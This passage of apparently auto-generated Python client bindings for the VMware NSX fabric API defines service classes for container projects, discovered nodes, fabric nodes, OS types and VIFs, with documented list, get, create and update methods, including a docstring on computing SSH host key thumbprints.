:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ContainerNetworkPolicyListResult`
:return: com.vmware.nsx.model.ContainerNetworkPolicyListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'container_cluster_id': container_cluster_id,
'container_project_id': container_project_id,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class ContainerProjects(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_projects'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ContainerProjectsStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
container_project_id,
):
"""
Returns information about a specific project
:type container_project_id: :class:`str`
:param container_project_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ContainerProject`
:return: com.vmware.nsx.model.ContainerProject
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'container_project_id': container_project_id,
})
def list(self,
container_cluster_id=None,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all container projects
:type container_cluster_id: :class:`str` or ``None``
:param container_cluster_id: Identifier of the container cluster (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ContainerProjectListResult`
:return: com.vmware.nsx.model.ContainerProjectListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'container_cluster_id': container_cluster_id,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class DiscoveredNodes(VapiInterface):
"""
"""
LIST_HAS_PARENT_TRUE = "true"
"""
Possible value for ``hasParent`` of method :func:`DiscoveredNodes.list`.
"""
LIST_HAS_PARENT_FALSE = "false"
"""
Possible value for ``hasParent`` of method :func:`DiscoveredNodes.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.discovered_nodes'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _DiscoveredNodesStub)
self._VAPI_OPERATION_IDS = {}
def createtransportnode(self,
node_ext_id,
transport_node,
):
"""
NSX components are installaed on host and transport node is created
with given configurations.
:type node_ext_id: :class:`str`
:param node_ext_id: (required)
:type transport_node: :class:`com.vmware.nsx.model_client.TransportNode`
:param transport_node: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNode`
:return: com.vmware.nsx.model.TransportNode
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('createtransportnode',
{
'node_ext_id': node_ext_id,
'transport_node': transport_node,
})
def get(self,
node_ext_id,
):
"""
Returns information about a specific discovered node.
:type node_ext_id: :class:`str`
:param node_ext_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.DiscoveredNode`
:return: com.vmware.nsx.model.DiscoveredNode
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'node_ext_id': node_ext_id,
})
def hostprep(self,
node_ext_id,
):
"""
:type node_ext_id: :class:`str`
:param node_ext_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.Node
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.Node`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('hostprep',
{
'node_ext_id': node_ext_id,
})
def list(self,
cm_local_id=None,
cursor=None,
display_name=None,
external_id=None,
has_parent=None,
included_fields=None,
ip_address=None,
node_id=None,
node_type=None,
origin_id=None,
page_size=None,
parent_compute_collection=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all discovered nodes.
:type cm_local_id: :class:`str` or ``None``
:param cm_local_id: Local Id of the discovered node in the Compute Manager (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type display_name: :class:`str` or ``None``
:param display_name: Display name of discovered node (optional)
:type external_id: :class:`str` or ``None``
:param external_id: External id of the discovered node, ex. a mo-ref from VC (optional)
:type has_parent: :class:`str` or ``None``
:param has_parent: Discovered node has a parent compute collection or is a standalone
host (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type ip_address: :class:`str` or ``None``
:param ip_address: IP address of the discovered node (optional)
:type node_id: :class:`str` or ``None``
:param node_id: Id of the fabric node created from the discovered node (optional)
:type node_type: :class:`str` or ``None``
:param node_type: Discovered Node type like HostNode (optional)
:type origin_id: :class:`str` or ``None``
:param origin_id: Id of the compute manager from where this node was discovered
(optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type parent_compute_collection: :class:`str` or ``None``
:param parent_compute_collection: External id of the compute collection to which this node belongs
(optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.DiscoveredNodeListResult`
:return: com.vmware.nsx.model.DiscoveredNodeListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cm_local_id': cm_local_id,
'cursor': cursor,
'display_name': display_name,
'external_id': external_id,
'has_parent': has_parent,
'included_fields': included_fields,
'ip_address': ip_address,
'node_id': node_id,
'node_type': node_type,
'origin_id': origin_id,
'page_size': page_size,
'parent_compute_collection': parent_compute_collection,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def reapplyclusterconfig(self,
node_ext_id,
):
"""
:type node_ext_id: :class:`str`
:param node_ext_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNode`
:return: com.vmware.nsx.model.TransportNode
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('reapplyclusterconfig',
{
'node_ext_id': node_ext_id,
})
class Nodes(VapiInterface):
"""
"""
LIST_HYPERVISOR_OS_TYPE_ESXI = "ESXI"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_RHELKVM = "RHELKVM"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_UBUNTUKVM = "UBUNTUKVM"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_HYPERV = "HYPERV"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_RHELCONTAINER = "RHELCONTAINER"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_CENTOSCONTAINER = "CENTOSCONTAINER"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_RHELSERVER = "RHELSERVER"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_UBUNTUSERVER = "UBUNTUSERVER"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_CENTOSSERVER = "CENTOSSERVER"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_CENTOSKVM = "CENTOSKVM"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_SLESKVM = "SLESKVM"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_HYPERVISOR_OS_TYPE_SLESSERVER = "SLESSERVER"
"""
Possible value for ``hypervisorOsType`` of method :func:`Nodes.list`.
"""
LIST_RESOURCE_TYPE_HOSTNODE = "HostNode"
"""
Possible value for ``resourceType`` of method :func:`Nodes.list`.
"""
LIST_RESOURCE_TYPE_EDGENODE = "EdgeNode"
"""
Possible value for ``resourceType`` of method :func:`Nodes.list`.
"""
LIST_RESOURCE_TYPE_PUBLICCLOUDGATEWAYNODE = "PublicCloudGatewayNode"
"""
Possible value for ``resourceType`` of method :func:`Nodes.list`.
"""
PERFORMACTION_ACTION_ENTER_MAINTENANCE_MODE = "enter_maintenance_mode"
"""
Possible value for ``action`` of method :func:`Nodes.performaction`.
"""
PERFORMACTION_ACTION_EXIT_MAINTENANCE_MODE = "exit_maintenance_mode"
"""
Possible value for ``action`` of method :func:`Nodes.performaction`.
"""
PERFORMACTION_ACTION_GET_MAINTENANCE_MODE_STATE = "get_maintenance_mode_state"
"""
Possible value for ``action`` of method :func:`Nodes.performaction`.
"""
PERFORMACTION_VSAN_MODE_EVACUATE_ALL_DATA = "evacuate_all_data"
"""
Possible value for ``vsanMode`` of method :func:`Nodes.performaction`.
"""
PERFORMACTION_VSAN_MODE_ENSURE_OBJECT_ACCESSIBILITY = "ensure_object_accessibility"
"""
Possible value for ``vsanMode`` of method :func:`Nodes.performaction`.
"""
PERFORMACTION_VSAN_MODE_NO_ACTION = "no_action"
"""
Possible value for ``vsanMode`` of method :func:`Nodes.performaction`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.nodes'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NodesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
node,
):
"""
Creates a host node (hypervisor) or edge node (router) in the transport
network. When you run this command for a host, NSX Manager attempts to
install the NSX kernel modules, which are packaged as VIB, RPM, or DEB
files. For the installation to succeed, you must provide the host login
credentials and the host thumbprint. To get the ESXi host thumbprint,
SSH to the host and run the **openssl x509 -in /etc/vmware/ssl/rui.crt
-fingerprint -sha256 -noout** command. To generate host key thumbprint
using SHA-256 algorithm please follow the steps below. Log into the
host, making sure that the connection is not vulnerable to a man in the
middle attack. Check whether a public key already exists. Host public
key is generally located at '/etc/ssh/ssh_host_rsa_key.pub'. If the key
is not present then generate a new key by running the following command
and follow the instructions. **ssh-keygen -t rsa** Now generate a
SHA256 hash of the key using the following command. Please make sure to
pass the appropriate file name if the public key is stored with a
different file name other than the default 'id_rsa.pub'. **awk '{print
$2}' id_rsa.pub | base64 -d | sha256sum -b | sed 's/ .\*$//' | xxd -r
-p | base64** This api is deprecated as part of FN+TN unification.
Please use Transport Node API POST /transport-nodes to install NSX
components on a node.
:type node: :class:`vmware.vapi.struct.VapiStruct`
:param node: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.Node`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.Node
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.Node`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'node': node,
})
def create_0(self,
target_node_id,
target_uri,
):
"""
Invoke POST request on target fabric node. This api is deprecated as
part of FN+TN unification. Please use Transport Node API POST
/transport-nodes/<transport-node-id>/<target-node-id>/<target-uri>
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create_0',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def delete(self,
node_id,
unprepare_host=None,
):
"""
:type node_id: :class:`str`
:param node_id: (required)
:type unprepare_host: :class:`bool` or ``None``
:param unprepare_host: Delete a host and uninstall NSX components (optional, default to
true)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'node_id': node_id,
'unprepare_host': unprepare_host,
})
def delete_0(self,
target_node_id,
target_uri,
):
"""
Invoke DELETE request on target fabric node. This api is deprecated as
part of FN+TN unification. Please use Transport Node API DELETE
/transport-nodes/<transport-node-id>/<target-node-id>/<target-uri>
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete_0',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def get(self,
node_id,
):
"""
Returns information about a specific fabric node (host or edge). This
api is deprecated, use Transport Node API GET
/transport-nodes/<transport-node-id> to get fabric node information.
:type node_id: :class:`str`
:param node_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.Node
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.Node`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'node_id': node_id,
})
def get_0(self,
target_node_id,
target_uri,
):
"""
Invoke GET request on target fabric node. This api is deprecated as
part of FN+TN unification. Please use Transport Node API GET
/transport-nodes/<transport-node-id>/<target-node-id>/<target-uri>
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get_0',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def list(self,
cursor=None,
discovered_node_id=None,
display_name=None,
external_id=None,
hardware_id=None,
hypervisor_os_type=None,
included_fields=None,
ip_address=None,
page_size=None,
resource_type=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all fabric nodes (hosts and edges). This api
is deprecated as part of FN+TN unification. Please use Transport Node
API GET /transport-nodes to list all fabric nodes.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type discovered_node_id: :class:`str` or ``None``
:param discovered_node_id: Id of the discovered node which was converted to create this node
(optional)
:type display_name: :class:`str` or ``None``
:param display_name: HostNode display name (optional)
:type external_id: :class:`str` or ``None``
:param external_id: HostNode external id (optional)
:type hardware_id: :class:`str` or ``None``
:param hardware_id: Hardware Id of the host (optional)
:type hypervisor_os_type: :class:`str` or ``None``
:param hypervisor_os_type: HostNode's Hypervisor type, for example ESXi, RHEL KVM or UBUNTU
KVM. (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type ip_address: :class:`str` or ``None``
:param ip_address: Management IP address of the node (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type resource_type: :class:`str` or ``None``
:param resource_type: Node type from 'HostNode', 'EdgeNode', 'PublicCloudGatewayNode'
(optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.NodeListResult`
:return: com.vmware.nsx.model.NodeListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'discovered_node_id': discovered_node_id,
'display_name': display_name,
'external_id': external_id,
'hardware_id': hardware_id,
'hypervisor_os_type': hypervisor_os_type,
'included_fields': included_fields,
'ip_address': ip_address,
'page_size': page_size,
'resource_type': resource_type,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def performaction(self,
node_id,
action=None,
evacuate_powered_off_vms=None,
vsan_mode=None,
):
"""
The supported fabric node actions are enter_maintenance_mode,
exit_maintenance_mode for EdgeNode. This API is deprecated, please call
TransportNode maintenance mode API to update maintenance mode, refer to
\"Update transport node maintenance mode\".
:type node_id: :class:`str`
:param node_id: (required)
:type action: :class:`str` or ``None``
:param action: Supported fabric node actions (optional)
:type evacuate_powered_off_vms: :class:`bool` or ``None``
:param evacuate_powered_off_vms: Evacuate powered-off vms (optional, default to false)
:type vsan_mode: :class:`str` or ``None``
:param vsan_mode: Vsan decommission mode (optional, default to
ensure_object_accessibility)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.Node
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.Node`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('performaction',
{
'node_id': node_id,
'action': action,
'evacuate_powered_off_vms': evacuate_powered_off_vms,
'vsan_mode': vsan_mode,
})
def restartinventorysync(self,
node_id,
):
"""
Restart the inventory sync for the node if it is currently internally
paused. After this action the next inventory sync coming from the node
is processed. This api is deprecated as part of FN+TN unification.
Please use Transport Node API POST
/transport-nodes/<transport-node-id>?action=restart_inventory_sync to
restart inventory sync of node.
:type node_id: :class:`str`
:param node_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('restartinventorysync',
{
'node_id': node_id,
})
def update(self,
node_id,
node,
):
"""
:type node_id: :class:`str`
:param node_id: (required)
:type node: :class:`vmware.vapi.struct.VapiStruct`
:param node: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.Node`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.Node
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.Node`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'node_id': node_id,
'node': node,
})
def update_0(self,
target_node_id,
target_uri,
):
"""
Invoke PUT request on target fabric node. This api is deprecated as
part of FN+TN unification. Please use Transport Node API PUT
/transport-nodes/<transport-node-id>/<target-node-id>/<target-uri>
:type target_node_id: :class:`str`
:param target_node_id: Target node UUID (required)
:type target_uri: :class:`str`
:param target_uri: URI of API to invoke on target node (required)
:raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
Gateway Timeout
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update_0',
{
'target_node_id': target_node_id,
'target_uri': target_uri,
})
def upgradeinfra(self,
node_id,
disable_vm_migration=None,
):
"""
Perform a service deployment upgrade on a host node
:type node_id: :class:`str`
:param node_id: (required)
:type disable_vm_migration: :class:`bool` or ``None``
:param disable_vm_migration: Should VM migration be disabled during upgrade (optional, default
to false)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.Node
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.Node`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('upgradeinfra',
{
'node_id': node_id,
'disable_vm_migration': disable_vm_migration,
})
class Ostypes(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.ostypes'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _OstypesStub)
self._VAPI_OPERATION_IDS = {}
def get(self):
"""
Returns names of all supported host OS.
:rtype: :class:`com.vmware.nsx.model_client.SupportedHostOSListResult`
:return: com.vmware.nsx.model.SupportedHostOSListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
class Vifs(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.vifs'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _VifsStub)
self._VAPI_OPERATION_IDS = {}
def list(self,
cursor=None,
host_id=None,
included_fields=None,
lport_attachment_id=None,
owner_vm_id=None,
page_size=None,
sort_ascending=None,
sort_by=None,
vm_id=None,
):
"""
Returns information about all VIFs. A virtual network interface
aggregates network interfaces into a logical interface unit that is
indistinuishable from a physical network interface.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type host_id: :class:`str` or ``None``
:param host_id: Id of the host where this vif is located. (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type lport_attachment_id: :class:`str` or ``None``
:param lport_attachment_id: LPort Attachment Id of the virtual network interface. (optional)
:type owner_vm_id: :class:`str` or ``None``
:param owner_vm_id: External id of the virtual machine. (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type vm_id: :class:`str` or ``None``
:param vm_id: External id of the virtual machine. (optional)
:rtype: :class:`com.vmware.nsx.model_client.VirtualNetworkInterfaceListResult`
:return: com.vmware.nsx.model.VirtualNetworkInterfaceListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
